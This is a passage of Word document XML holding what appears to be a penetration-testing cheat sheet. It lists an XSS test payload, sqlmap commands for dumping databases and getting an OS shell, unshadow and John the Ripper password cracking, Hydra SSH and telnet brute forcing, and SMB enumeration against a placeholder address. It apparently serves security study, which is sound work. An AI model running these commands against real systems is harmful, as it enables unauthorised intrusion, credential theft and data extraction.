              <w:t>/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46666ADE" w14:textId="11F2261C" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="24292E"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="222BEE44" w14:textId="77022CB8" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r w:rsidRPr="0019187C">
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="0019187C">
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>ScRiPt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>&gt;alert(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>1)&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>ScRiPt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="297A986A" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="7B0C765F" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r w:rsidRPr="0019187C">
              <w:t>Great XSS bypass list:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D3E4E9D" w14:textId="0D4DA6BC" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r w:rsidRPr="0019187C">
              <w:t>https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36ED278F" w14:textId="69B3A67C" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="0019187C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Find a reflection point</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4313624E" w14:textId="332B8FA4" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="0019187C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Test with tag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59AF1D81" w14:textId="7092DA0F" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="0019187C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Test with HTML/JavaScript code (alert('XSS'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E0BCF88" w14:textId="0304BD43" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">Reflected XSS = Payload is carried inside the request the victim sends to the website. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Typically</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the link contains the malicious payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67DD67A3" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="00C36402"/>
          <w:p w14:paraId="1A5ABD9F" w14:textId="16255CF1" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402">
            <w:r>
              <w:t>Persistent XSS = Payload remains in the site that multiple users can fall victim to. Typically embedded via a form or forum post</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="3AF07206" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B221806" w14:textId="17314113" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u http://10.10.10.10 -p parameter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56006E21" w14:textId="5348BC58" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>http://10.10.10.10  --</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">data </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>POSTstring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p parameter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="698DBA8F" w14:textId="2E70FA42" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u http://10.10.10.10 --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5A8FA5" w14:textId="2C2D7780" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u http://10.10.10.10 </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t>dump</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4040B4DD" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="03C26C20" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019187C">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Check if injection exists</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54BAC7EA" w14:textId="33345195" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -r </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Post.req</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1C943001" w14:textId="704627C2" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u "http://10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file.php?id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1" -p id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C026197" w14:textId="4093E9A2" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u "http://10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" --data="user=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>admin&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=admin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0266C5C9" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="3BBE6119" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019187C">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Get database if injection Exists</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="119FD4F4" w14:textId="6993FA4E" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -r </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.req</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3BB94917" w14:textId="458815FF" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u "http://10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file.php?id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1" -p id --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4E35D6E3" w14:textId="4DBB4C18" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u "http://10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" --data="user=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>admin&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=admin" --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0281B303" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="44BD26D2" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019187C">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Get Tables in a Database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="278730FE" w14:textId="62272D28" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -r </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.req</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -D </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> --tables</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086F3D92" w14:textId="5018377D" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u "http://10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file.php?id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=1" -p id -D </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> --tables</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E99AD7B" w14:textId="2B65062F" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u </w:t>
            </w:r>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:t>http://10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t>data=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t>user=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>admin&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=admin</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -D </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t>tables</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A11E4D" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="381448EA" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019187C">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Get data in a Database tables</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D3E03C8" w14:textId="5DAB0B1F" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -r </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.req</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -D </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -T </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> --dump</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F241A7F" w14:textId="101823FA" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u "http://10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file.php?id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=1" -p id -D </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -T </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> --dump</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="448372C8" w14:textId="7E83675C" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -u "http://10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" --data="user=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>admin&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=admin" -D </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -T </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> --dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01D747F7" w14:textId="77FBC5F7" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>SQLMap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="5DEEE46E" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594E766C" w14:textId="7B5A92CB" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="0019187C">
              <w:t>unshadow passwd shadow &gt; unshadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3222038C" w14:textId="1FAABF5D" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t>Prepares a file for John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="008E43CD" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C9A4A6E" w14:textId="4BC0D7D2" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="0019187C">
              <w:t xml:space="preserve">john -wordlist /path/to/wordlist -users=users.txt </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>hashfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0626260C" w14:textId="7DE69E46" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t>Hash Cracking with John</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="6D938A2F" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57FE8C96" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">hydra -L users.txt -P pass.txt -t 10 10.10.10.10 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -s 22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39CF7C9C" w14:textId="0E7E990E" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>hydra -L users.txt -P pass.txt telnet://10.10.10.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1744AE57" w14:textId="77777777" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t>SSH Brute forcing with Hydra.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67EC4157" w14:textId="45B8606E" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t xml:space="preserve">You can change protocol as well, for instance instead of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> use ftp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="24A79062" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C124B4C" w14:textId="070B8C63" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmblookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -A 10.10.10.10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34DF5C9B" w14:textId="44B5A1C3" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smbclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -L //10.10.10.10 -N (list shares)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F07069" w14:textId="0BB39F4E" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smbclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> //10.10.10.10/share -N (mount share)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="075E6910" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>enum4linux -a 10.10.10.10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FDDFCC2" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019187C">
              <w:t xml:space="preserve"> --script=smb-enum-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>users,smb</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D04BE40" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019187C">
              <w:t xml:space="preserve"> -p445 --script=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>-vuln-* 10.10.10.10 -v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="588E6AA5" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
